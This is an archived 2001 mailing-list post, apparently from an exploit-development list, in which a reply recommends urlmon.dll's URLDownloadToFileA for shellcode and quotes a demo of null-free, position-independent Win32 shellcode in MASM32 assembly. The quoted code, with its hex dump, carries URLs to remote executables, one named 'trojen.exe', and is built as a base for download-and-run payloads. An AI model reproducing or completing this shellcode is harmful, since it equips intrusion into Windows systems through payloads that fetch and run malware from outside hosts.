Haven't had time to check through your code yet, so you might already know this: To make everything even smaller there is a dll called urlmon.dll which contains a function named URLDownloadToFileA. It does just what it says: Downloads and saves a file from the web in one call. I used this in my first win32 exploit and it works perfect.. :) /andreas "Enrique A. Compań Gzz." wrote: > > This is an ultra early demo of the new shellcode I'm developing, designed to > be fast & small & polymorphic, without > hard coded values. > > I have a previous version of a finished shellcode like this one, I'll > release it soon... > > The Shell Code : > ----------------------------- > > This code was developed with masm32. > > This is only the base of the shellcode, it can be used to develop your own > stuff. > > Features: > > * No need to know the address of our code, no need to have the address in a > register, no matter what technique > you use to exploit the buffer (shellcode in the buffer, shellcode after > EIP, jump back... etc) > * No Nulls > * Fast & Small > > You can even compile this code and run the EXE and it will run and terminate > normally... (nice ;-)) > > .386 ; Next time > we'll be using 586 code..... optimize! > > .model flat, stdcall > > include \masm32\include\windows.inc > include \masm32\include\kernel32.inc > includelib \masm32\lib\kernel32.lib > include \masm32\include\user32.inc > includelib \masm32\lib\user32.lib > > EXITPROCESS_ADDR EQU 077E8F32Dh ; We'll take > rid of this later ;-) > > .code > > shell_code_start: > > jmp pi_offset ; Jump to call back function > > call_back: > > pop esi ; ESI now points to the first > variable (in this case "url"), no matter the size of the "real_code", > ; ESI will always point there > real_code_start: > > xor eax, eax ; Our real code > begins here... > push eax > mov eax, EXITPROCESS_ADDR > call eax ; Do nothing > but call ExitProcess with a hard-coded value (just for testing) > > real_code_end: > > pi_offset: > call near ptr call_back ; Return and push the address > > vars_start: > > url db "http://box.org/trojen.exe", 0ffh ; Just a var > > end shell_code_start > > 000001F4 0000 0000 0000 0000 0000 0000 EB0B 5E33 C050 B82D > ..............^3.P.- > 00000208 F3E8 77FF D0E8 F0FF FFFF 6874 7470 3A2F 2F77 7777 > ..w.......http://www > 0000021C 2E76 6972 7465 6B77 6562 2E6E 6574 2F6E 6378 3939 > .virtekweb.net/ncx99 > 00000230 2E65 7865 FF00 > .exe.. > > I've seen variations of this technique... but this one is just fine, it has > the qualities of a good s-code. > > Oh yeah... I recommend you to use TASM32 or MASM32. > > BTW I'm collecting some references about this stuff you'll find very > useful...I'll give them away soon. > > My stuff to come... > > Enrique A. Compań Gzz. > Virtek Labs > > Greets: RaiSe, Undersec Team , Net-Search E-Zine, the lists ;-) and all the > rest...
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 14:33:04 PDT